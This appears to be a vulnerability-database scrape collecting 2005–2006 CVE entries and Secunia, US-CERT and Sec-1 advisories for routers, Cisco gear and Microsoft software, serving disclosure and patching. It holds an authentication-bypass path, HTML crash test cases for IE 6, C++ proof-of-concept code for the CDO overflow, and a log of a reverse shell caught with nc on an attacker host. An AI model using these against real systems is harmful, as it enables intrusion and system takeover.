VARIoT IoT vulnerabilities database
VAR-200508-0235 | CVE-2005-2419 | ECI Telecom B-FOCuS Router 312+ Unauthorized Access Vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
B-FOCuS Router 312+ allows remote attackers to bypass authentication and gain unauthorized access via a direct request to firmwarecfg.
An attacker can disclose the administrator password through the Web interface of the device.
This can lead to a complete compromise of the router. The B-FOCuS Router 312+ is marketed as providing users with a reliable and secure ADSL2+ connection. By default, the management interface of the ECI router is available via HTTP and is protected by a login screen. However, an attacker can easily bypass the login screen by visiting the firmwarecfg page in the unprotected cgi-bin directory and download the router's current settings, including plaintext connection and management passwords.
----------------------------------------------------------------------
TITLE:
ECI B-FOCuS Router firmwarecfg Missing Access Control Restrictions
SECUNIA ADVISORY ID:
SA16205
VERIFY ADVISORY:
http://secunia.com/advisories/16205/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass
WHERE:
From local network
OPERATING SYSTEM:
B-FOCuS Router 312+
http://secunia.com/product/5436/
DESCRIPTION:
D.is.evil has reported a security issue in B-FOCuS Router 312+, which
can be exploited by malicious people to bypass certain security
restrictions.
The problem is caused due to the lack of access controls on the
"/cgi-bin/firmwarecfg" page of the router's web management interface.
This can reportedly be exploited to retrieve sensitive information
such as the current router settings, connection and management
passwords, or to cause a DoS by resetting the router constantly.
PROVIDED AND/OR DISCOVERED BY:
D.is.evil
----------------------------------------------------------------------
About:
This Advisory was delivered by Secunia as a free service to help
everybody keep their systems up to date against the latest
vulnerabilities.
Subscribe:
http://secunia.com/secunia_security_advisories/
Definitions: (Criticality, Where etc.)
http://secunia.com/about_secunia_advisories/
Please Note:
Secunia recommends that you verify all advisories you receive by
clicking the link.
Secunia NEVER sends attached files with advisories.
Secunia does not advise people to install third party patches, only
use those supplied by the vendor.
----------------------------------------------------------------------
Unsubscribe: Secunia Security Advisories
http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org
----------------------------------------------------------------------
VAR-200507-0117 | CVE-2005-2196 | Apple AirPort WEP key Security restriction bypass vulnerability |
CVSS V2: 2.1 CVSS V3: - Severity: LOW |
The Apple AirPort card uses a default WEP key when not connected to a known or trusted network, which can cause it to automatically connect to a malicious network.
This can lead to various attacks against the affected computer.
This issue does not affect AirPort Extreme. Apple AirPort is a Wi-Fi base station product of Apple. The product supports streaming music and wireless printing. A security restriction bypass vulnerability exists in Apple AirPort
VAR-200507-0116 | CVE-2005-2195 | Apple Darwin Streaming Server Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Apple Darwin Streaming Server 5.5 and earlier allows remote attackers to cause a denial of service (application crash) via a URL with a filename containing a .cgi extension and an MS-DOS device name such as AUX, CON, PRN, COM1, or LPT1, a different vulnerability than CVE-2003-0421 and CVE-2003-0502. Darwin Streaming Server is prone to a denial-of-service vulnerability.
----------------------------------------------------------------------
TITLE:
Apple Darwin Streaming Server Web Admin Denial of Service
SECUNIA ADVISORY ID:
SA16056
VERIFY ADVISORY:
http://secunia.com/advisories/16056/
CRITICAL:
Less critical
IMPACT:
DoS
WHERE:
From remote
SOFTWARE:
Darwin Streaming Server 5.x
http://secunia.com/product/3085/
DESCRIPTION:
Sowhat has reported a vulnerability in Darwin Streaming Server, which
can be exploited by malicious people to cause a DoS (Denial of
Service).
The vulnerability is caused due to an error in the web-based admin
interface when handling HTTP requests containing MS-DOS device names
with ".cgi" extension appended (e.g. AUX.cgi).
Successful exploitation causes the service to stop responding.
The vulnerability has been reported in versions 5.5 and prior for
Windows.
SOLUTION:
Update to version 5.5.1.
PROVIDED AND/OR DISCOVERED BY:
Sowhat
ORIGINAL ADVISORY:
http://secway.org/Advisory/AD20050713.txt
VAR-200507-0149 | CVE-2005-2279 | Cisco ONS 15216 OADM telnet Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco ONS 15216 Optical Add/Drop Multiplexer (OADM) running firmware 2.2.2 and earlier allows remote attackers to cause a denial of service (management plane session loss) via crafted telnet data. The Cisco ONS 15216 OADM has separate data planes, one that exists solely for device management, and the other that exists for data transport purposes.
When the vulnerability is triggered, the Telnet service will no longer respond to subsequent legitimate requests. However, the data plane (Network traffic that is being switched and transmitted by the device.) is not affected by this attack.
This vulnerability exists in the Cisco ONS 15216 OADM device that is running software release 2.2.2 and earlier software releases. Cisco ONS is an optical network platform developed by CISCO
VAR-200507-0150 | CVE-2005-2280 | Cisco Security Agent malformed IP packet denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco Security Agent (CSA) 4.5 allows remote attackers to cause a denial of service (system crash) via a crafted IP packet. The CSA has a vulnerability in handling malformed IP packets. A remote attacker can exploit this vulnerability to perform a denial of service attack on the device. Repeated attacks can lead to continued denial of service. This issue may be triggered by a maliciously crafted IP packet. This vulnerability affects only CSA 4.5 on Windows operating systems other than Windows XP. A denial of service vulnerability exists in CSA 4.5
VAR-200507-0192 | CVE-2005-2242 | Cisco CallManager Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 before 4.1(3)SR1 allows remote attackers to cause a denial of service (memory consumption and restart) via crafted packets to (1) the CTI Manager (ctimgr.exe) or (2) the CallManager (ccm.exe). The CallManager CTI Manager service is susceptible to a remote denial of service vulnerability.
This issue is documented in Cisco bug CSCee00116, which is available to Cisco customers.
This issue may be exploited to cause the affected application to restart, denying service to legitimate users.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco. There are denial of service vulnerabilities in multiple versions of CCM (3.2 and earlier, 3.3 earlier than 3.3(5), 4.0 earlier than 4.0(2a)SR2b, and 4.1 earlier than 4.1(3)SR1)
VAR-200507-0193 | CVE-2005-2243 | Cisco CallManager inetinfo.exe Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Memory leak in inetinfo.exe in Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 before 4.1(3)SR1, when Multi Level Admin (MLA) is enabled, allows remote attackers to cause a denial of service (memory consumption) via a large number of Admin Service Tool (AST) logins that fail.
This issue is documented in Cisco bug CSCef47060, which is available to Cisco customers.
Attackers may exploit this vulnerability by repeatedly attempting, and failing, to log into the affected service. It is reported that as much as 750 megabytes of memory may be consumed, resulting in a severe reduction in performance, possibly denying service to legitimate users.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco. Inetinfo.exe in multiple versions of CCM (3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 before 4.1(3)SR1) has memory leaks, which may result in a denial of service
VAR-200507-0194 | CVE-2005-2244 | Cisco CallManager aupair.exe Buffer overflow vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
The aupair service (aupair.exe) in Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 before 4.1(3)SR1 allows remote attackers to execute arbitrary code or corrupt memory via crafted packets that trigger a memory allocation failure and lead to a buffer overflow. The CallManager aupair service is susceptible to an unspecified remote buffer overflow vulnerability. This issue is due to a failure of the application to properly bounds check user-supplied data prior to copying it to a fixed size memory buffer.
This issue is documented in Cisco bug CSCsa75554, which is available to Cisco customers.
This vulnerability allows remote attackers to execute arbitrary machine code in the context of the affected application. Failed exploit attempts will likely result in crashing the affected process, denying service to legitimate users.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco
VAR-200507-0195 | CVE-2005-2245 | F5 BIG-IP Unknown vulnerability |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Unknown vulnerability in F5 BIG-IP 9.0.2 through 9.1 allows attackers to "subvert the authentication of SSL transactions," via unknown attack vectors, possibly involving NATIVE ciphers. F5 BIG-IP is susceptible to an unspecified SSL authentication bypass vulnerability.
It is conjectured that if the BIG-IP is configured to authenticate by utilizing certificate-based authentication, attackers may be able to bypass the requested authentication checks. This allows remote attackers to gain access to protected Web sites. Depending on the nature of the protected Web sites, various further attacks may also be possible.
Further details are not currently available. This BID will be updated as more information is disclosed.
Versions of BIG-IP from 9.0.2 through to 9.1 are affected. F5 BIG-IP is an all-in-one network device integrating network traffic management, application security management, load balancing and other functions, from F5 Networks of the United States.
----------------------------------------------------------------------
TITLE:
BIG-IP Unspecified SSL Authentication Security Bypass
SECUNIA ADVISORY ID:
SA16008
VERIFY ADVISORY:
http://secunia.com/advisories/16008/
CRITICAL:
Moderately critical
IMPACT:
Security Bypass
WHERE:
From remote
OPERATING SYSTEM:
BIG-IP 9.x
http://secunia.com/product/3158/
DESCRIPTION:
A vulnerability has been reported in BIG-IP, which potentially can be
exploited by malicious people to bypass certain security
restrictions.
SOLUTION:
The vendor has issued a security update for versions 9.0.4, 9.0.5,
and 9.1.
ftp://ftp.f5.com/Domestic/bigip/bigip9x-hotfix-CR49528/
As a workaround, the vendor recommends temporarily disabling NATIVE
ciphers on any clientssl or serverssl profiles that require or
request authentication. This may result in a loss of SSL performance.
PROVIDED AND/OR DISCOVERED BY:
Reported by vendor.
ORIGINAL ADVISORY:
F5 Networks:
http://tech.f5.com/home/bigip-next/solutions/security/sol4944.html
VAR-200507-0191 | CVE-2005-2241 | Cisco CallManager RISDC Denial of service vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Cisco CallManager (CCM) 3.2 and earlier, 3.3 before 3.3(5), 4.0 before 4.0(2a)SR2b, and 4.1 before 4.1(3)SR1 does not quickly time out Realtime Information Server Data Collection (RISDC) sockets, which results in a "resource leak" that allows remote attackers to cause a denial of service (memory and connection consumption) in RisDC.exe.
This issue is documented in Cisco bug CSCed37403, which is available to Cisco customers.
If attackers repeatedly create, and then drop TCP connections to the vulnerable service, excessive memory resources will be consumed, potentially leading to further connections being refused.
This issue was originally documented in BID 14227. Cisco CallManager (CCM) is a set of call processing components based on the Cisco Unified Communications solution of Cisco. A denial of service vulnerability exists in multiple versions of CCM (3.2 and prior, 3.3 prior to 3.3(5), 4.0 prior to 4.0(2a)SR2b, and 4.1 prior to 4.1(3)SR1)
VAR-200507-0210 | CVE-2005-2313 | Check Point SecuRemote NG Privilege escalation vulnerability |
CVSS V2: 7.2 CVSS V3: - Severity: HIGH |
Check Point SecuRemote NG with Application Intelligence R54 allows attackers to obtain credentials and gain privileges via unknown attack vectors. Check Point SecuRemote NG is affected by a local information disclosure vulnerability. This issue may allow an attacker to disclose authentication credentials used to access the VPN application.
An attacker could use the information gathered through the exploitation of this vulnerability to gain access to, or carry out other attacks against, an affected computer or the network protected by the VPN. SecuRemote NG is Check Point's firewall and VPN system
VAR-200507-0086 | CVE-2005-2181 | Cisco 7940/7960 VoIP Message spoofing vulnerability |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
Cisco 7940/7960 Voice over IP (VoIP) phones do not properly check the Call-ID, branch, and tag values in a NOTIFY message to verify a subscription, which allows remote attackers to spoof messages such as the "Messages waiting" message. 7960 Router is prone to a remote security vulnerability. Cisco 7940/7960 is Cisco's network switching equipment. A remote spoofing vulnerability exists in Cisco 7940/7960 Voice over IP (VoIP) phones. This allows remote attackers to spoof e.g
VAR-200507-0076 | CVE-2005-2169 | Quick&Dirty source.php Directory traversal vulnerability |
CVSS V2: 5.0 CVSS V3: - Severity: MEDIUM |
Directory traversal vulnerability in source.php in Quick & Dirty PHPSource Printer 1.1 and earlier allows remote attackers to read arbitrary files via ".../...//" sequences in the file parameter, which are reduced to "../" when PHPSource Printer uses a regular expression to remove "../" sequences. Quick And Dirty Phpsource Printer is prone to a directory traversal vulnerability.
----------------------------------------------------------------------
TITLE:
Quick & Dirty PHPSource Printer Directory Traversal Vulnerability
SECUNIA ADVISORY ID:
SA15900
VERIFY ADVISORY:
http://secunia.com/advisories/15900/
CRITICAL:
Moderately critical
IMPACT:
Exposure of system information, Exposure of sensitive information
WHERE:
From remote
SOFTWARE:
Quick & Dirty PHPSource Printer 1.x
http://secunia.com/product/5323/
DESCRIPTION:
Seth Alan Woolley has discovered a vulnerability in Quick & Dirty
PHPSource Printer, which can be exploited by malicious people to gain
knowledge of sensitive information.
Input passed to the "file" parameter in "source.php" is not properly
sanitised before being used.
The vulnerability has been confirmed in version 1.0. Other versions
may also be affected.
SOLUTION:
The vendor has released version 1.1, which does not properly fix the
vulnerability.
Edit the source code to ensure that input is properly verified.
PROVIDED AND/OR DISCOVERED BY:
Seth Alan Woolley
VAR-200507-0067 | CVE-2005-2160 | Ipswitch Imail cookie Information disclosure |
CVSS V2: 5.0 CVSS V3: 7.5 Severity: HIGH |
IMail stores usernames and passwords in cleartext in a cookie, which allows remote attackers to obtain sensitive information. IMail is prone to an information disclosure vulnerability. IMail is an email system that includes WebMail
VAR-200507-0033 | CVE-2005-2089 | Microsoft IIS Multiple security vulnerabilities |
CVSS V2: 4.3 CVSS V3: - Severity: MEDIUM |
Microsoft IIS 5.0 and 6.0 allows remote attackers to poison the web cache, bypass web application firewall protection, and conduct XSS attacks via an HTTP request with both a "Transfer-Encoding: chunked" header and a Content-Length header, which causes IIS to incorrectly handle and forward the body of the request in a way that causes the receiving server to process it as a separate HTTP request, aka "HTTP Request Smuggling". IIS Far East Edition is prone to a cross-site scripting vulnerability
VAR-200604-0201 | CVE-2006-1188 | RDS.Dataspace ActiveX control bypasses ActiveX security model |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Microsoft Internet Explorer 5.01 through 6 allows remote attackers to execute arbitrary code via HTML elements with a certain crafted tag, which leads to memory corruption. This vulnerability information is a summary of multiple vulnerabilities released at the same time; note that it includes information on vulnerabilities other than the one named in the title. Microsoft Windows fails to properly handle COM Objects. This vulnerability may allow a remote unauthenticated attacker to execute arbitrary code on a vulnerable system. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. This is related to the handling of certain HTML tags. Attackers could also use HTML email for the attack.
National Cyber Alert System
Technical Cyber Security Alert TA06-101A
Microsoft Windows and Internet Explorer Vulnerabilities
Original release date: April 11, 2006
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
For more complete information, refer to the Microsoft Security
Bulletin Summary for April 2006.
I.
(CVE-2006-0012)
II. If the user is logged on with
administrative privileges, the attacker could take complete control of
an affected system. An attacker may also be able to cause a denial of
service.
III. Solution
Apply Updates
Microsoft has provided updates for these vulnerabilities in the
Security Bulletins and on the Microsoft Update site.
Workarounds
Please see the US-CERT Vulnerability Notes for workarounds. Many of
these vulnerabilities can be mitigated by following the instructions
listed in the Securing Your Web Browser document.
Appendix A. Please send
email to <cert@cert.org> with "TA06-101A Feedback VU#876678" in the
subject.
____________________________________________________________________
For instructions on subscribing to or unsubscribing from this
mailing list, visit <http://www.us-cert.gov/cas/signup.html>.
____________________________________________________________________
Produced 2006 by US-CERT, a government organization.
Terms of use:
<http://www.us-cert.gov/legal.html>
____________________________________________________________________
Revision History
Apr 11, 2006: Initial release
Visit http://www.microsoft.com/windows/ie/default.mspx or
http://en.wikipedia.org/wiki/Internet_Explorer for detailed information.
o Memory Corruption Vulnerability: <mshtml.dll>#7d519030
=================================
Following HTML code forces IE 6 to crash:
> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
> "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
> <html> <fieldset> <h4>
> <pre><td>
> <menu>
> <legend>
> <a>
> <ul>
> <small>
> <fieldset>
> <h6>
> </h6
> </u>
> </optgroup>
> </tr>
> </map>
> </ul
> </dfn>
>
> </del>
> </h2>
> </dir>
> </ul>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135035582812-7d519030.html
These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=0012e7c0 esi=00000000
> edi=00000004 eip=7d519030 esp=0012e780 ebp=0012e894
>
> 7d519012 55 push ebp
> 7d519013 8bec mov ebp,esp
> 7d519015 8b4104 mov eax,[ecx+0x4]
> 7d519018 394508 cmp [ebp+0x8],eax
> 7d51901b 7c09 jl mshtml+0x69026 (7d519026)
> 7d51901d 7edc jle mshtml+0x68ffb (7d518ffb)
> 7d51901f 33c0 xor eax,eax
> 7d519021 40 inc eax
> 7d519022 5d pop ebp
> 7d519023 c20800 ret 0x8
> 7d519026 83c8ff or eax,0xffffffff
> 7d519029 ebf7 jmp mshtml+0x69022 (7d519022)
> 7d51902b 90 nop
> 7d51902c 90 nop
> 7d51902d 90 nop
> 7d51902e 90 nop
> 7d51902f 90 nop
> FAULT ->7d519030 8b4108 mov eax,[ecx+0x8]
> ds:0023:00000008=????????
> 7d519033 85c0 test eax,eax
> 7d519035 7425 jz mshtml+0x6905c (7d51905c)
> 7d519037 8b10 mov edx,[eax]
> 7d519039 f6c210 test dl,0x10
> 7d51903c 7408 jz mshtml+0x69046 (7d519046)
> 7d51903e f6c220 test dl,0x20
> 7d519041 7519 jnz mshtml+0x6905c (7d51905c)
> 7d519043 8b400c mov eax,[eax+0xc]
> 7d519046 8b4808 mov ecx,[eax+0x8]
> 7d519049 85c9 test ecx,ecx
o Memory Corruption Vulnerability: <mshtml.dll>#7d529d35
=================================
Following HTML code forces IE 6 to crash:
> <!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN"
> "http://www.w3.org/TR/html4/loose.dtd">
> <bdo>
> </span>
> <pre>
>
> <param>
> <form>
> <colgroup>
> <small>
> </small>
> </colgroup>
> </map>
> </button>
> </code
>
> <blockquote>
> <th>
> <small>
>
> </tbody>
> </tr>
> </ol>
> </tbody>
> </ol>
> </code>
> </strong>
>
>
> <head>
> <fieldset>
> <style>
>
> </style
> </dir>
> </a>
> </td
> </li>
> </label
> </object>
> </bdo
> </th
> </object
> </q>
>
> <ol>
> <object>
Online-demo:
http://morph3us.org/security/pen-testing/msie/ie60-1135042070015-7d529d35.html
These are the register values and the ASM dump at the time of the access
violation:
> eax=00000000 ebx=0012e88c ecx=00000000 edx=00000012 esi=00e7dbb0
> edi=00000002 eip=7d529d35 esp=0012e778 ebp=0012e778
>
> 7d529d0e e811170000 call mshtml+0x7b424 (7d52b424)
> 7d529d13 85c0 test eax,eax
> 7d529d15 0f85c5500800 jne mshtml!DllGetClassObject+0x10fa2 (7d5aede0)
> 7d529d1b 0fb65508 movzx edx,byte ptr [ebp+0x8]
> 7d529d1f 8d849680000000 lea eax,[esi+edx*4+0x80]
> 7d529d26 5e pop esi
> 7d529d27 5d pop ebp
> 7d529d28 c20c00 ret 0xc
> 7d529d2b 90 nop
> 7d529d2c 90 nop
> 7d529d2d 90 nop
> 7d529d2e 90 nop
> 7d529d2f 90 nop
> 7d529d30 8bff mov edi,edi
> 7d529d32 55 push ebp
> 7d529d33 8bec mov ebp,esp
> FAULT ->7d529d35 0fbe4114 movsx eax,byte ptr [ecx+0x14]
> ds:0023:00000014=??
> 7d529d39 c1e004 shl eax,0x4
> 7d529d3c 0578aa4b7d add eax,0x7d4baa78
> 7d529d41 7410 jz mshtml+0x79d53 (7d529d53)
> 7d529d43 8b400c mov eax,[eax+0xc]
> 7d529d46 234508 and eax,[ebp+0x8]
> 7d529d49 f7d8 neg eax
> 7d529d4b 1bc0 sbb eax,eax
> 7d529d4d f7d8 neg eax
> 7d529d4f 5d pop ebp
> 7d529d50 c20400 ret 0x4
> 7d529d53 33c0 xor eax,eax
> 7d529d55 ebf8 jmp mshtml+0x79d4f (7d529d4f)
o Vulnerable versions:
=====================
The DoS vulnerability was successfully tested on:
> MS IE 6 SP2 - Win XP Pro SP2
> MS IE 6 - Win 2k SP4
o Disclosure Timeline:
=====================
xx Feb 06 - Vulnerabilities discovered.
08 Mar 06 - Vendor contacted.
22 Mar 06 - Vendor confirmed vulnerabilities.
25 May 06 - Public release.
o Solution:
==========
Install the latest security update (MS06-013) for Internet Explorer [2].
o Credits:
=========
Thomas Waldegger <bugtraq@morph3us.org>
BuHa-Security Community - http://buha.info/board/
If you have questions, suggestions or criticism about the advisory feel
free to send me a mail. The address 'bugtraq@morph3us.org' is more a
spam address than a regular mail address therefore it's possible that
some mails get ignored. Please use the contact details at
http://morph3us.org/ to contact me.
Greets fly out to cyrus-tc, destructor, nait, rhy, trappy and all
members of BuHa.
----------------------------------------------------------------------
TITLE:
Microsoft Design Tools msdds.dll Code Execution Vulnerability
SECUNIA ADVISORY ID:
SA16480
VERIFY ADVISORY:
http://secunia.com/advisories/16480/
CRITICAL:
Highly critical
IMPACT:
System access
WHERE:
From remote
SOFTWARE:
Microsoft Visual Studio .NET 2003
http://secunia.com/product/1086/
Microsoft Office 2003 Student and Teacher Edition
http://secunia.com/product/2278/
Microsoft Office 2003 Standard Edition
http://secunia.com/product/2275/
Microsoft Internet Explorer 5.01
http://secunia.com/product/9/
Microsoft Internet Explorer 5.5
http://secunia.com/product/10/
Microsoft Internet Explorer 6.x
http://secunia.com/product/11/
Microsoft Office 2003 Professional Edition
http://secunia.com/product/2276/
Microsoft Office 2003 Small Business Edition
http://secunia.com/product/2277/
DESCRIPTION:
A vulnerability has been reported in Microsoft Visual Studio .NET,
which potentially can be exploited by malicious people to compromise
a vulnerable system.
The COM object is known to be installed as part of the following
products:
* Microsoft Visual Studio .NET 2003
* Microsoft Office Professional 2003
Other products may also include the affected COM object.
NOTE: An exploit has been published. However, there are currently
conflicting reports about the exploitability of this issue. Some
reports confirm that code execution is possible, while other reports
indicate that the problem can't be reproduced. Secunia has currently
not been able to reproduce the vulnerability in version 7.10.3077.0
of the COM object.
This advisory will be updated when more information is available.
SOLUTION:
Restrict use of ActiveX controls to trusted web sites only.
PROVIDED AND/OR DISCOVERED BY:
Reported by anonymous person.
VAR-200510-0005 | CVE-2005-1987 | Microsoft Internet Explorer can use any COM object |
CVSS V2: 7.5 CVSS V3: - Severity: HIGH |
Buffer overflow in Collaboration Data Objects (CDO), as used in Microsoft Windows and Microsoft Exchange Server, allows remote attackers to execute arbitrary code when CDOSYS or CDOEX processes an e-mail message with a large header name, as demonstrated using the "Content-Type" string. Microsoft Internet Explorer (IE) will attempt to use COM objects that were not intended to be used in the web browser. This can cause a variety of impacts, such as causing IE to crash. Microsoft DDS Library Shape Control COM object contains an unspecified vulnerability, which may allow a remote attacker to execute arbitrary code on a vulnerable system. This issue is due to a failure of the library to properly bounds check user-supplied data prior to copying it to an insufficiently sized memory buffer.
This issue presents itself when an attacker sends a specifically crafted email message to an email server utilizing the affected library.
The vulnerability has been reported in the following versions:
* Windows 2000 (remote code execution)
* Windows XP Service Pack 1 (remote code execution)
* Windows XP Service Pack 2 (local privilege escalation)
* Windows Server 2003 (local privilege escalation)
* Windows Server 2003 Service Pack 1 (local privilege escalation)
3) An error in the MSDTC when validating TIP (Transaction Internet
Protocol) requests can be exploited to cause the service to stop
responding via a specially crafted network message. The malicious TIP
message can be transferred through the affected system to another,
which causes the MSDTC on both systems to stop responding.
Successful exploitation requires that the TIP protocol is enabled for
MSDTC.
SOLUTION:
Apply patches.
----------------------------------------------------------------------
SEC-1 LTD. The vulnerability exists when event sinks are used within
Microsoft Exchange 2000 or Microsoft Mail services to parse e-mail
content. Several Content Security packages were identified to be
vulnerable/exploitable.
The vulnerability can be exploited by crafting an e-mail with a large
header name such as "Content-Type<LARGE STRING>:".
A failure to correctly determine the length of the string results in a
stack overflow. Under certain conditions the vulnerability can also be
used to bypass content security mechanisms such as virus and content
security scanners. Proof of concept code to recreate the problem is
included at the bottom of this advisory.
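As an added, defender-side example that is not part of the Sec-1 advisory: a small Python pre-filter of the kind a mail gateway could run ahead of CDO, scanning a raw message's header block for the shape of the trigger described above, a header field name far longer than any legitimate one, and for physical lines beyond the RFC 5322 limit. The name-length limit and both sample messages are constructed for illustration.

```python
import re

MAX_FIELD_NAME_LEN = 128   # assumed gateway policy; RFC 5322 sets no name limit
MAX_LINE_LEN = 998         # RFC 5322 maximum physical line length (excluding CRLF)

# RFC 5322 field-name: printable US-ASCII (0x21-0x7E) except ':' (0x3A)
_FIELD_LINE = re.compile(rb"^([!-9;-~]+):")


def header_lines(raw: bytes) -> list:
    """Physical lines of the header block (everything before the first
    blank line), left unfolded so that per-line limits can be checked."""
    for sep in (b"\r\n\r\n", b"\n\n"):
        if sep in raw:
            raw = raw.split(sep, 1)[0]
            break
    return raw.splitlines()


def audit_headers(raw: bytes) -> list:
    """Return a list of human-readable findings; [] means nothing suspicious."""
    findings = []
    for idx, line in enumerate(header_lines(raw), 1):
        if len(line) > MAX_LINE_LEN:
            findings.append(
                f"line {idx}: {len(line)}-byte header line exceeds {MAX_LINE_LEN}")
        if line[:1] in (b" ", b"\t"):
            continue  # folded continuation of the previous field: no new name
        m = _FIELD_LINE.match(line)
        if m is None:
            findings.append(f"line {idx}: malformed header line (no 'name:' prefix)")
            continue
        name = m.group(1)
        if len(name) > MAX_FIELD_NAME_LEN:
            findings.append(
                f"line {idx}: {len(name)}-byte field name starting {name[:16]!r} "
                f"exceeds {MAX_FIELD_NAME_LEN}")
    return findings


# Constructed samples: a normal message, and one shaped like the trigger
# ("Content-Type" followed by a long run of characters before the colon).
CLEAN_MSG = (
    b"From: me@test.com\r\n"
    b"To: me@test.com\r\n"
    b"Subject: status\r\n"
    b"Content-Type: text/plain; charset=us-ascii\r\n"
    b"\r\n"
    b"hello\r\n"
)
OVERSIZED_MSG = (
    b"From: me@test.com\r\n"
    b"To: me@test.com\r\n"
    b"Content-Type" + b"A" * 2000 + b": text/plain\r\n"
    b"\r\n"
    b"hello\r\n"
)

if __name__ == "__main__":
    for label, msg in (("clean", CLEAN_MSG), ("oversized", OVERSIZED_MSG)):
        print(label, audit_headers(msg) or "no findings")
```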
Exploit Availability:
Sec-1 do not release exploit code to the general public.
Attendees of the Sec-1 Applied Hacking & Intrusion prevention course
will receive a copy of this exploit as part of the Sec-1 Exploit
Arsenal.
See: http://www.sec-1.com/applied_hacking_course.html
Exploit Example:
[root@homer PoC]# perl cdo.pl -f me@test.com -t me@test.com -h 10.0.0.53
Enter IP address of your attacking host: 10.0.0.200
Enter Port for shellcode to connect back on: 80
[*]----Connected OK!
[*]----Sending MAIL FROM: me@test.com
[*]----Sending RCPT TO: <me@test.com>
[*]----Sending Malformed E-mail body
[*]----Shellcode Length: 316
[*]----Shellcode type: Reverse shell
[*]----Done.
[!] Note this may take a while. Inetinfo will crash and restart
This will happen until a nops are reached. You may also want
to clear the queue to restore Inetinfo.exe by deleting malformed
e-mail from c:\Inetpub\mailroot\Queue
[root@homer PoC]# nc -l -p 80 -v
listening on [any] 80 ...
10.0.0.53: inverse host lookup failed: Unknown host
connect to [10.0.0.200] from (UNKNOWN) [10.0.0.53] 1100
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-2000 Microsoft Corp.
C:\WINNT\system32>c:\whoami
NT AUTHORITY\SYSTEM
C:\WINNT\system32>
Vendor Response:
Microsoft have released the following information including a fix,
http://www.microsoft.com/technet/security/bulletin/MS05-048.mspx
Common Vulnerabilities and Exposures (CVE) Information:
The Common Vulnerabilities and Exposures (CVE) project has assigned
the following names to these issues. These are candidates for
inclusion in the CVE list (http://cve.mitre.org), which standardizes
names for security problems.
CAN-2005-1987
Demonstration:
The following CDO code demonstrates the problem.
Step 1.
Create an E-mail named vuln.eml including a large "Content-Type:"
header.
Step 2.
// Compile with -GX option (on current MSVC the equivalent switch is /EHsc).
// Needs a Windows build environment: the #import directives pull the ADO and
// CDO type libraries from the system DLLs.
#include <windows.h>
#include <stdio.h>
#import <msado15.dll> no_namespace rename("EOF", "adoEOF")
#import <cdosys.dll> rename_namespace("CDO")

int main()
{
    CoInitialize(0);
    try
    {
        // Load vuln.eml (the message with the oversized header name from
        // Step 1) into a CDO Message object through its ADO stream.
        CDO::IMessagePtr spMsg(__uuidof(CDO::Message));
        _StreamPtr spStream(spMsg->GetStream());
        spStream->Position = 0;
        spStream->Type = adTypeBinary;
        spStream->LoadFromFile("vuln.eml");
        spStream->Flush();
        // Reading the Content-Type field of each body part makes CDO parse
        // the oversized header name; this is where the overflow occurs.
        for (long i = 1; i <= spMsg->BodyPart->BodyParts->Count; i++)
        {
            CDO::IBodyPartPtr spBdy = spMsg->BodyPart->BodyParts->Item[i];
            _variant_t v =
                spBdy->Fields->Item["urn:schemas:mailheader:Content-Type"]->Value;
        }
    }
    catch (_com_error &e)
    {
        printf("COM error[0x%X, %s]\n", e.Error(), (LPCTSTR)e.Description());
    }
    catch (...)
    {
        printf("General exception\n");
    }
    CoUninitialize();
    return 0;
}
Copyright 2005 Sec-1 LTD. All rights reserved.
**************************************************************
NEW: Sec-1 Hacking Training - Learn to breach network security
to further your knowledge and protect your network
http://www.sec-1.com/applied_hacking_course.html
**************************************************************
Technical Cyber Security Alert TA05-284A
Microsoft Windows, Internet Explorer, and Exchange Server
Vulnerabilities
Original release date: October 11, 2005
Last revised: --
Source: US-CERT
Systems Affected
* Microsoft Windows
* Microsoft Internet Explorer
* Microsoft Exchange Server
For more complete information, refer to the Microsoft Security
Bulletin Summary for October 2005.
Overview
Microsoft has released updates that address critical vulnerabilities
in Windows, Internet Explorer, and Exchange Server.
I. Description
Microsoft Security Bulletins for October 2005 address vulnerabilities
in Windows and Internet Explorer. Further information is available in
the following US-CERT Vulnerability Notes:
VU#214572 - Microsoft Plug and Play fails to properly validate user
supplied data
Microsoft Plug and Play contains a flaw in the handling of message
buffers that may result in local or remote arbitrary code execution or
